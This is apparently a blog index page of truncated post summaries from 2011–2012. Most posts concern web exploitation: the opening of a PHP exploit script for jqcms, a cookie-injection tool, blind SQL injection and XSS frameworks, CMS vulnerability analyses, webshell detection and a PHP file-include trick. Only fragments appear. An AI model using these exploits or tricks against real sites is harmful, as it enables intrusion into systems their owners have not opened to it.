摘要: 环境要求: register_globals = On.<?php /* * Date : 2012/4/24 * Team : H3xIe Security TeAm 2005 - 2012 * This exploit script is jqcms, It requires administrative privileges can. * * Welcome to We team WebSite. * <http://www.hkmjj.com/> */ ini_set('display_errors', 0); set_time_li...阅读全文
posted @ 2012-04-25 06:31 學習 阅读(246) 评论(0) 编辑
摘要: <?php /*######################################################################### * / * * - >> SchramCookie Inject ver 1.0 * C0de by Nig3h -Greetz To All H3xIe Member. * link : xiaosan.cnblogs.com * ex : http://host/?url={$argv...阅读全文
posted @ 2011-11-07 14:40 學習 阅读(110) 评论(0) 编辑
摘要: Includes 1 GB of trafficAccess to Free serversLimited availability with possible waiting timesForced disconnection after 6 hours (redial possible)Bandwidth limited to 2 Mbpshttp://cyberghostvpn.com/en/product/purchase.html阅读全文
posted @ 2011-11-06 19:17 學習 阅读(79) 评论(0) 编辑
摘要: This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections.We reported bsqlbf when it first hit the net back in April 2006 with bsqlbf v1.1, then the v2.0 update in June 200阅读全文
posted @ 2011-11-05 00:54 學習 阅读(65) 评论(0) 编辑
摘要: The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, p阅读全文
posted @ 2011-11-05 00:42 學習 阅读(69) 评论(0) 编辑
摘要: Easily search for exploits in BackTrack's exploitdb (files.csv).Highlights:Search the exploitdb archive Case sensitive & insensitive Change output mode Automaticlly copy your exploits Requirements: python (tested with python 2.7.1 and 2.5.2) local exploitdb (pre-installed on BackTrack Linux)阅读全文
posted @ 2011-10-03 22:05 學習 阅读(91) 评论(0) 编辑
摘要: ##Author : HeXie S3curity TeAm#Date : 2011.10.01##FIle : /image.php<?php/**#########################################* PHPCMS File Manager* Copyright (c) 2004-2006 phpcms.cn* Author: Longbill ( http://www.longbill.cn )* longbill.cn@gmail.com*#########################################*/$path = $_GET阅读全文
posted @ 2011-10-01 04:46 學習 阅读(91) 评论(0) 编辑
摘要: 精迅CMS(Jxcms)是基于采用网络中已经成熟、稳定的技术PHP+MYSQL开发而成,利用本系统您可以很方便地管理自己的网站。本系统是一款由文章模型、采集管理、广告系统、会员中心、友情链接、公告、单网页、数据备份还原等多个强大功能模块组合而成的强大、易用、扩展性强的开源网站管理软件。我们以精益求精的态度,追求卓越品质,为中小网站用户提供一套完美的迅速建站解决方案,我们在开发过程中无处不充分考虑用户的使用习惯,尽最大可能降低用户的使用门槛,让用户关注于内容维护本身,而不需要投入过多的时间来学习系统的使用技巧,在细节处下大工夫。Jxcms目前只有一个文章模型,但已有的功能模块都努力做到精益求..阅读全文
posted @ 2011-09-28 05:14 學習 阅读(59) 评论(0) 编辑
摘要: Author -> hExi3 Security TeAmTestEd On : IIS6.0+2k3分析过程 :\e\class\functions.php 2609行 ReUserjs 函数.function ReUserjs($jsr,$addpath){ global $empire,$public_r; DoFileMkDir($addpath.$jsr['jsfilename']);//建目录 //取得js模板 $jstemptext=GetTheJstemp($jsr[jstempid]); //取出设置Js数组 $ret_r=ReturnReplaceLi阅读全文
posted @ 2011-09-04 01:35 學習 阅读(2544) 评论(0) 编辑
摘要: 在对大容量数据导出时会有漏掉一些数据, 这是程序的Bug. 暂时取消程序代码. 我会将在后面一段时间去修复它并且开放.[暂时取消 ]阅读全文
posted @ 2011-06-03 07:44 學習 阅读(76036) 评论(3) 编辑
摘要: SESSION和COOKIE不同,COOKIE是存放在客户端的文件,而SESSION是存放在服务器上,同时也增强了安全性。如果一个 WEBSHELL的验证方式是SESSION,我们可以通过它检测出服务器的木马。 我的环境是IIS+PHP,在PHP.ini中,有这么个选项,session.gc_maxlifetime = 1440,也就是SESSION默 认到期的时间是24小时,如果客户端没做出反应,24小时后session文件就删除了,即使在客户端关闭了浏览器,它的session文件依然存在于 服务器上,php.ini中设置存放路径是session.save_path = "C:\W阅读全文
posted @ 2011-06-03 02:19 學習 阅读(2629) 评论(0) 编辑
摘要: 建一个php文件,内容: <? include $path."config/config.inc.php" ?> 当前目录下建一个config文件夹,再在文件夹内建config.inc.php,就可以了。 访问http://xxx/xx.php?x=file:///\\ip\x$\xx\xyz xyz就是config文件夹所在的路径by: 乱雪阅读全文
posted @ 2011-06-03 01:52 學習 阅读(1499) 评论(0) 编辑